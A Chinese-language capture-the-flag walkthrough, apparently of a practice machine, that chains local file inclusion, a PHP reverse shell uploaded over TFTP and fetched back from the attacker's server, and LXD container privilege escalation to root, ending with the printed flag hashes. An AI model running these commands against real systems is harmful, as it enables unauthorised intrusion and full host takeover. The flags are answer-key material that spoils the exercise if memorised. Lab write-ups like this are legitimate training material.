一、 目标计算机上通过 UDP运行什么服务?
1
2
3
#使用nmap扫描IP
nmpa -sU IP
tftp

image-20230316111033677

二、托管在端口 80 上的网页容易受到哪类漏洞的攻击?
1
2
#本地文件包含
Local File Inclusion
三、TFTP 用于存储文件的默认系统文件夹是什么?
1
/var/lib/tftpboot/
四、哪个有趣的文件位于Web服务器文件夹中,可用于横向移动?
1
2
3
4
#使用gobuster扫目录
gobuster dir -u http://IP -w /usr/share/dirb/wordlists/comment.txt
#访问http://IP/file=.htpasswd
.htpasswd

image-20230316142611449

image-20230316142715454

五、用户 Mike 所属并可被利用进行权限提升的组是什么?
1
2
3
4
5
6
7
8
9
10
11
12
13
#利用tftp上传PHPshell到靶机
tftp 靶机IP
put /usr/share/webshells/php-reverse-shell.php
#在web中访问shell,shell在tftp默认存储目录
http://IP/?file=/var/lib/tftpboot/php-reverse-shell.php
ncat -lvnp 4444
#提升为ttyshell
SHELL=/bin/bash script -q /dev/null
#切换到mike用户
su mike
#查看mike所属组
groups
lxd

image-20230316151353533

image-20230316151808865

image-20230316152017468

六、当使用映像通过容器利用系统时,我们寻找一个非常小的发行版。我们最喜欢这项任务以山脉命名。该发行版名称是什么?
1
2
#google搜索提示内容
Alpine
七、我们为容器设置什么标志,以便它在主机系统上具有 root 权限?
1
security.privileged=true
八、如果根文件系统挂载在容器中的 /mnt 处,那么挂载主机系统后,在容器上的什么位置可以找到根标志?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#下载利用工具
git clone https://github.com/saghul/lxd-alpine-builder.git
#编译工具
sudo ./build-alpine
#开启python的web服务
python3 -m http.server 80
#在靶机中下载编译完成的tar包
wget http://10.10.14.35/alpine-v3.17-x86_64-20230316_0437.tar.gz
#使用lxc以镜像的方式导入tar包
lxc image import ./alpine-v3.17-x86_64-20230316_0437.tar.gz --alias myimages
#查看image列表
lxc image list
#设置容器标志,给予root权限
lxc init myimages ignite -c security.privileged=true
#将宿主机的/mnt/root/挂载到容器下
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
#启动容器
lxc start ignite
#执行shell
lxc exec ignite /bin/sh
#查看id
id
#寻找root.txt
find / type f -name root.txt 2>/dev/null
/mnt/root/

image-20230316164913391

image-20230316164926341

image-20230316165603164

image-20230316165545517

image-20230316170058117

image-20230316171244257

image-20230316171653225

九、提交user
1
2
3
#文件路径为/mnt/root/home/mike/user.txt
cat /mnt/root/home/mike/user.txt
a56ef91d70cfbf2cdb8f454c006935a1

image-20230316172142314

十、提交root
1
2
3
#文件路径为/mnt/root/root/root.txt
cat /mnt/root/root/root.txt
c693d9c7499d9f572ee375d4c14c7bcf

image-20230316172142314

总结
  • LXD提权过程
  • 本地文件读取漏洞的利用